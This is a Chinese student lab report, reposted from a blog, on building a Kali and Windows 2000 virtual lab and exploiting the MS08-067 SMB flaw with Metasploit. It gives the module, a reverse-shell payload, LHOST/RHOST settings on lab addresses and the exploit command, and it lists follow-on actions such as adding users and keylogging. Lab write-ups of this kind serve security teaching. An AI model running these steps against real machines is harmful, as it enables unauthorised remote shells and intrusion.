一、实验内容
2.分析攻击的原理以及获取了什么样的权限。
二、实验要求
1.熟悉kali原理和使用方法。
2.认真操作,详细记录实验过程和实验结果。
三、实验工具
笔记本电脑一台,安装parallels desktop虚拟机,安装kali和靶机系统windows10。另外安装了vmware虚拟机,安装kali和靶机系统windows2000。
四、实验步骤
(一)pd虚拟机下搭建渗透测试环境
1.在pd虚拟机下安装kali攻击机系统以及windows10靶机系统。
2.在parallels desktop中设置两台虚拟机网络为共享网络模式(若是vmware虚拟机则是nat模式),自动分配IP地址,之后两台虚拟机就可以直接ping通。
(1)靶机ip地址获取:在cmd中输入ipconfig,获取ip地址为10.211.55.3。
(2)攻击机ip地址获取:在shell中输入ifconfig,获取ip地址为10.211.55.4。
(3)可见,两台虚拟机处于同一网段下,可以互相ping通。
一般来说在unix或linux系统中会一直ping下去,这时按快捷键Ctrl+Z或Ctrl+C均可停止ping。
(4)补充说明“vmware下虚拟机的三种网络模式”
a.桥接。桥接网络是指本地物理网卡和虚拟网卡通过VMnet0虚拟交换机进行桥接,物理网卡和虚拟网卡在拓扑图上处于同等地位,那么物理网卡和虚拟网卡就相当于处于同一个网段,虚拟交换机就相当于一台现实网络中的交换机,所以两个网卡的IP地址也要设置为同一网段。
b.NAT。NAT模式中,就是让虚拟机借助NAT(网络地址转换)功能,通过宿主机器所在的网络来访问公网。NAT模式中,虚拟机的网卡和物理网卡的网络,不在同一个网络,虚拟机的网卡是在vmware提供的一个虚拟网络。
NAT和桥接的比较: NAT模式和桥接模式虚拟机都可以上外网;由于NAT的网络在vmware提供的一个虚拟网络里,所以局域网其他主机是无法访问虚拟机的,而宿主机可以访问虚拟机,虚拟机可以访问局域网的所有主机,因为真实的局域网相对于NAT的虚拟网络,就是NAT的虚拟网络的外网,不懂的人可以查查NAT的相关知识;桥接模式下,多个虚拟机之间可以互相访问;NAT模式下,多个虚拟机之间也可以相互访问。
c.Host-Only。在Host-Only模式下,虚拟网络是一个全封闭的网络,它唯一能够访问的就是主机。其实Host-Only网络和NAT网络很相似,不同的地方就是Host-Only网络没有NAT服务,所以虚拟网络不能连接到Internet。主机和虚拟机之间的通信是通过VMware Network Adepter VMnet1虚拟网卡来实现的。
(二)vmware下搭建渗透测试环境
在按步骤进行攻击操作后(详细步骤见第三部分),发现作为靶机的win10系统无漏洞可攻击,于是改用老师所给的靶机系统进行试验,在vmware虚拟机下操作。
1.vmware下安装kali
这里注意其中一步操作“将GRUB安装至硬盘-将GRUB启动引导器安装到主引导记录吗?-是”后,“安装启动引导器的设备”不能空着,可填写dev-sda,否则可能出现安装linux后黑屏只出现光标的现象。
2.设置网络模式
设置虚拟机下的kali和windows靶机系统为nat模式。其中设置靶机ip地址为192.168.87.131,攻击机ip地址为192.168.87.129,且互相都可以ping通。
(三)MS08_067远程漏洞攻击实践
1.在kali终端中开启msfconsole。
2.输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:
3.输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
4.输入命令show payloads会显示出有效的攻击载荷,比如shell_reverse_tcp。
5.命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:
6.使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
7.输入命令show options显示我们需要在攻击前需要设置的数据。
8.输入命令set LHOST "kali Ip",即set LHOST 192.168.87.129;set RHOST "Win Ip",即set RHOST 192.168.87.131。
使用命令show options再次查看payload状态。
9.输入命令exploit开始攻击,如下图所示是正常攻击成功结果。
10.在kali上执行ipconfig/all得到如下图所示:
在win 2000上执行同样的命令(所得与上图相同)如下图所示:
11.输入“netstat -a”命令,可以查看靶机开启了哪些端口。
12.输入“netstat -n”命令, 查看靶机端口的网络连接情况。
五、思考
1.原理分析
MS08_067是一个在windows445号端口上的漏洞,需要事先查看该端口是否开放,这里使用“nmap -PS 靶机ip”语句发现445号端口开放。因此可以使用MS08_067漏洞进行exploit。
2.实验拓展
本次实验获得了靶机的cmdshell,除了实验中展示的几种操作,还可以进行新建用户、截屏、记录键盘输入、获取ruby交互界面、进程迁移、安装成服务等等许多操作。今后还可以对浏览器、客户端等方面的攻击进行拓展实践。
转载于:https://www.cnblogs.com/20179204gege/p/7747655.html